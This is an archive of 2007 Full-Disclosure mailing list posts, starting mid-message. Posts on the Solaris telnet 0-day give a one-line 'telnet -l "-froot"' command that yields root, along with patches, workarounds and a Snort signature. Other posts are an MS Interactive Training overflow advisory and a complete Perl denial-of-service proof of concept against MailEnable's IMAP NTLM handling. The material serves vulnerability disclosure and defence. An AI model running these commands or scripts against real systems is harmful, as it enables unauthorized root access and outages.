they buy). I am unsure of how long we will see this in to-do items of corporate security teams around the world, but I am sure Sun's /8 is getting a lot of action recently. > > Oliver Gadi. > > -Original Message- > From: Gadi Evron [mailto:[EMAIL PROTECTED] > Sent: Sunday, February 11, 2007 10:01 PM > To: bugtraq@securityfocus.com > Cc: full-disclosure@lists.grok.org.uk > Subject: Solaris telnet vulnberability - how many on your network? > > Johannes Ullrich from the SANS ISC sent this to me and then I saw it on > the DSHIELD list: > > > If you run Solaris, please check if you got telnet enabled NOW. If > you > can, block port 23 at your perimeter. There is a fairly trivial > Solaris telnet 0-day. > > telnet -l "-froot" [hostname] > > will give you root on many Solaris systems with default installs > We are still testing. Please use our contact form at > https://isc.sans.org/contact.html > if you have any details about the use of this exploit. > > > You mean they still use telnet?! > > Update from HD Moore: > "but this bug isnt -froot, its -fanythingbutroot =P" > > On the exploits@ mailing list and on DSHIELD this vulnerability was > verified as real. > > If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a > strong suggestion. > > Anyone else running Solaris? > > Gadi. > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Solaris telnet vuln solutions digest and network risks
A couple of updates and a summary digest of useful information shared from all around on this vulnerability, for those of us trying to make sense of what it means to our networks: 1. Sun released a patch (although it is not a final one). It can be found on their site ( http://sunsolve.sun.com/tpatches - thanks to Casper Dik of Sun, for those who have been following the discussion). To quote: "the simplest possible fix on such short notice": http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923 2. If you haven't already, I strongly recommend checking your network for machines running telnet, and more specifcially, vulnerable to this particular issue. Several folks are speaking of third-party appliances running on Solaris, as well as some back-end VoIP devices that have been confirmed as vulnerable. Apparently, telnet returns a different answer when this vulnerability is used. We are not sure yet, but Noam Rathaus brought up the option that it looks like the client responds with a "Won't Authentication Option" to the server's "Do Authentication Option". This could perhaps be used to actively detect the "attack". 3. If this solution is viable for you and you haven't already, ACLing 23/tcp at the border or from your user space may not be a bad idea, if it won't kill anything. At least for now. 4. Bleeding Edge (ex Bleeding Snort) released snort signatures for this: http://www.bleedingthreats.net/index.php/2007/02/12/solaris-remote-telnet-root-exploit-signature/ Quoting: Chris Byrd has submitted an accurate signature for the exploit. # Submitted 2007-02-12 by Chris Byrd alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:.BLEEDING-EDGE EXPLOIT Solaris telnet USER environment vuln.; flow:to_server,established; content: .|ff fa 27 00 00 55 53 45 52 01 2d 66|.; rawbytes; classtype:attempted-user; reference:url,riosec.com/solaris-telnet-0-day; sid:2003411; rev:1;) 4. An analysis of how this vulnerability works can be found here: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf And blogs by Sun on how this happened and was fixed (thanks to Georg Oppenberg): http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit http://blogs.sun.com/danmcd/entry/how_opensolaris_did_its_job And a fine explanation by Casper Dik on Bugtraq: http://seclists.org/bugtraq/2007/Feb/0205.html 5. Apparently, this is the same vulnerability in 'login' that was in AIX in 1994: http://www.cert.org/advisories/CA-1994-09.html http://osvdb.org/displayvuln.php?osvdb_id=1007 6. Vulnerable systems: reports are unclear, some or all of Solaris 10. No earlier versions of Solaris/SunOS are vulnerable. 6. Other workarounds exist. Brad Powell suggested on Full-Disclosure: Quoting: For root login; there is a setting in /etc/default/login. If CONSOLE is set, then root can only login on that device i.e. "CONSOLE=/dev/ttya" means "root" can only login on ttya device. Any other user via telnet/ssh/whatever has to login as themselves and "su" to root. This doesn't prevent telnet -l "-fbin", or -flp; for those accounts best bet is to change /etc/passwd for the shell of system-account users to /sbin/noshell or /bin/false (noshell just logs the entry and exists) Of course disabling in.telnetd in /etc/inetd.conf (and doing a pkill -HUP inetd) if possible is a safe bet, but some sites are forced to use telnetd. Background: The original post on this, with the "exploit", can be found here: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf A bit of background: http://blogs.securiteam.com/index.php/archives/814 And some on how corporations responded as we saw from our own client base: http://blogs.securiteam.com/index.php/archives/819 Opinion: Whatever my thoughts are on how silly, sad or funny this vulnerability is (quaint really), how they use telnet (?!) and how Sun should be smacked on the back of the head for it, I have to honestly admit Sun's response and the level they were open to the community and industry on this without too many PR/legal blocks getting in their way are very encouraging, releasing information on the vulnerability, how it happened and why, a quick beta patch and even discussing openly on mailing lists. I am in awe. Now it is time for others to follow their example. This one, despite its simplicity and age is going to be with us for a while. Gadi Evron. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?
[EMAIL PROTECTED] wrote: >> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote: On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote: >> Am I missing something? This vulnerability is close to 10 years old. >> It was in one of the first versions of Solaris after Sun moved off of >> the SunOS BSD platform and over to SysV. It has specifically to do w= >> ith >> how arguments are processed via getopt() if I recall correctly. > You're confused with AIX/Linux > > Solaris did not have the -f option in login until much later. Hi Casper. While we have you here, any idea on when Sun will be patching this issue? >>> Now, follow the links from http://sunsolve.sun.com/tpatches >>> >>> Casper >>> >> Many thanks Casper! Can you give some more information on exactly what is >> patched. Any Sun released advisory? > > > The simplest possible fix on such short notice: > > http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923 > > Casper How about just uncommenting the following from /etc/default/login # If CONSOLE is set, root can only login on that device. # Comment this line out to allow remote login by root. # CONSOLE=/dev/console Not a fix to be sure, but at least prevents a remote login. Joe -- Joe Shamblin[EMAIL PROTECTED] Senior Systems Administrator Department of Computer Science (919) 660-6582 Duke University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network?
On Tue, 13 Feb 2007, Peter Ferrie wrote: > > I have to agree with a previous poster and suspect (only > > suspect) it could somehow be a backdoor rather than a bug. > > Reminds me of the WMF SetAbortProc() "backdoor" accusation. > :-) It was just bad design. > You know what? As unlikely as we agreed this is, with WMF, they deserved the accusation. :o) Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS Interactive Training .cbo Overflow
= MS Interactive Training .cbo Overflow = = MS Bulletin posted: = http://www.microsoft.com/technet/security/bulletin/MS07-005.mspx = = Affected Software: =Microsoft Windows 2000 =Microsoft Windows XP =Microsoft Windows Server 2003 = = Public disclosure on February 14, 2007 == Overview == When thinking about buffer overflow vulnerabilities, a file can sometimes be as harmful as a packet. Even though past security issues have taught us that it is unwise to use a string from a file/packet without first checking its length, this is what happened here. MS Interactive Training will open a file with a .cbo extension and read in the Syllabus details. Through the creation of a corrupt file, with a long Syllabus string it is possible to gain control of EIP and execute arbitrary code. == Exploitation == Remote exploitation through Internet Explorer can be obtained through hosting a malicious .cbo file which will be downloaded and opened automatically. == Solutions == - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft May, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MailEnable DoS POC
The POC attached exploits an out of bounds memory read in the NTLM
authentication
routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3
function of MENTLM.dll.
This appears to have been silently "patched" somewhere between versions 2.351
and
2.36-7. (observe the quotes).
(c34.dc0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=0040 edx= esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5rep movs dword ptr es:[edi],dword ptr [esi]
es:0023:0146b238= ds:0023:8146920b=
---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.34 (win32)
# Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#
use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;
&print_header;
my $target;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }
my $imapd_port = 143;
my $send_delay = 2;
my $PAD = 'A';
if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
sleep($send_delay);
$buf = ($PAD x 12).
"\xfa\xff\xff\xff".
($PAD x 12);
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);
$buf = ($PAD x 28).
"\x00\x01".
($PAD x 2).
"\xef\xbe\xad\xde";
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("MailEnable Pro <=v2.36 DoS POC\n");
print("by: <[EMAIL PROTECTED]>\n\n");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
